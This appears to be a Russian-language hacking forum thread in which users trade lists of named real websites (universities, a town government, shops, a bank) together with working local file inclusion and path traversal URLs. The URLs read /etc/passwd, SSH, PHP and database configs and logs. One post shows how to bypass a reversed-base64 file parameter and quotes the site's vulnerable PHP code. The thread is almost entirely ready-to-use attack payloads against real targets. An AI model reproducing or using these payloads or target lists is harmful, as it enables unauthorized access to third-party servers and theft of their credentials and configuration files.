PHP Иньекции

[PR 6]

Code:

http://web.ce.metu.edu.tr/index.php?id=../../../index

[PR 6]

Code:

http://www.ipp.mesi.ru/edu/index.php?id=index

 

Code:

http://www.motormania.hr/index.php?forwardUrl=../../../../../etc/passwd

 

Safe mode

 

Code:

http://www.mumost.cz/informace/index.htm?fr2=../../../

и тд и тп)

 

[PR 6]

Code:

http://www.piedmont.edu/index.php?id=../index.php%00

 

Code:

http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/passwd%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/ssh/sshd_config%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/httpd.conf%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../var/log/maillog%00

-----------------------------
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/passwd%00
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/php.ini%00
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/my.cnf%00


-----------------------------
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/passwd%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/ssh/sshd_config%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../var/log/xferlog%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00


-----------------------------
http://www.biblestudytools.com/History/AD/EarlyChurchFathers/Ante-Nicene/Origen/view.cgi?file=../../../../../../../../../../../../../../etc/passwd

 

Code:

http://www.embavenez-us.org/index.php/function.include?pagina=../../../../../../../../../../../../../../etc/passwd

----------------------------- fuck owner:)
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd - тут грязно ругается почему-то
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd%00
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/ssh/sshd_config%00

 

Code:

http://dtv.horizont.by/index.php?id=../../../../../../etc/passwd

вродь немало там хостится..

 

Code:

http://www.spaziopetardo.it/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.classicbattletech.com/index.php?action=../../../../../../../../../../../../../etc/passwd%00
http://highwaycompanions.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.velvetrevolver.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.everestkc.net/index.php?module=../../../../../../../../../../../../../etc/passwd%00

 

Ещё партеечка

Code:

http://www.cityteam.org/news/index.php?c=../../../../../../../../../../../../../etc/passwd%00
http://www.santana-aschaffenburg.de/index.php?c=../../../../../../../../../../../../../etc/passwd%00
http://www.tanzi.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://wiki.colortent.com/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://ja7nwi.ddo.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://www.savvycircle.com/page.php?page=../../../../../../../../../../../../../etc/passwd%00
http://www.oralabs.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://rubistar.4teachers.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://hibbingcurling.com/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://accessnorth.net/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.accessnorth.net/letterit/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.hamptonct.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.barapp.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.ninabonos.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.taylortaylorlondon.com/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.math.umd.edu/~dcarrera/bsm/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.carey.wa.edu.au/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://remerge.sourceforge.net/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://melissaphillippe.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.monkeyircd.org/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://nakabayashi-kensetsu.co.jp/recruit/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.solumandherbe.com/index.cgi/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://careers.eaglesold.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.californiafleurish.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://ultrateq-digital.co.uk/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.studionouveau.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://freeresalerights.lescigales.org/?page=../../../../../../../../../../../../../etc/passwd%00qwe123

антибоян - google

 

Директория

http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/

Файл в ней

http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME

 

Банка,
multibanka.com

Берёт файл, например:

Code:

http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRhb2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdXRzbGF2XzI9ZW1hbl9lbGlm

Base64!
Декодируем:

Code:

sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utslav_2=eman_elif

^_^

Code:

file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu

Делаем по умному /etc/passwd

Code:

/cte/=htap_elif;dwssap=eman_elif

И берём его

Code:

http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=

такая вот шн*га.

P.S:

get_file.php

PHP:


    include "include_php/my_encoder.php";
    

    decode_str( $_GET['q'] );
    $file_type = explode('.',$_GET['file_name']);
    $file_type = end($file_type);
     if(strtolower($file_type)=='pdf')
        header('Content-type: application/pdf');
    
//print_r($_GET);
    header("Content-Description: File Transfer");
     header("Content-Disposition: attachment; filename=". $_GET['file_name']);
    header("Content-Transfer-Encoding:  binary");
    header("Content-Type: application/download");
    header("Accept-Ranges: bytes");
    header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));

        
  
                    $file = $_GET['file_path']."/".$_GET['file_name'];                    
                    $filename = fopen($file,"r");
                    $data = fread($filename, filesize($file));
                    fclose($filename);

                    echo $data;



my_encoder.php

PHP:


    function encode_str($string) {        
        return base64_encode(strrev($string));
    }


    function decode_str($string) {
        $result = strrev(base64_decode($string));

            // SQL injection tests

                if ((eregi("SELECT", $s)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {
                    Header("Location: http://www.bs.lv/track_hacker.php");
                }

            $tmp_arr=split(";",$result);

            for ( $i=0; $i<=sizeof($tmp_arr); $i++ ) {
                $ta = split("=",$tmp_arr[$i]);

                if ($ta['0']) {
                    $_GET[$ta['0']] = $ta['1'];
                }
            }
        
    }



 

http://www.lastminute-music.com/index.php?inc=/etc/passwd


http://www.pubs.org.au/index.php?inc=/etc/passwd

 

тИЦ: 50
PR: 4

RFI

Code:

http://www.bloodfmba.ru/news/mir.php?id=RFI

 

Локальный инклюд.
До /etc/passwd несмог пробраться, на хостинге фильтр.

локальный инклюд.
что то ненашёл /etc/passwd

Такая же беда

 

PR4

LFI

Code:

http://www.akademiaurody.com/index.php?id=[LFI]

 

LFI

тИЦ 240
PR 5/10

Code:

http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd

 

На форуме нашёл тока sql-inj к сайту, поэтому выложу php-inj

LFI

Code:

http://www.uvm.edu/student_life/?Page=../phpinfo.php

 

ну и от меня кусочек

HTML:

http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00

HTML:

http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00

HTML:

http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00

HTML:

http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00

 

http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd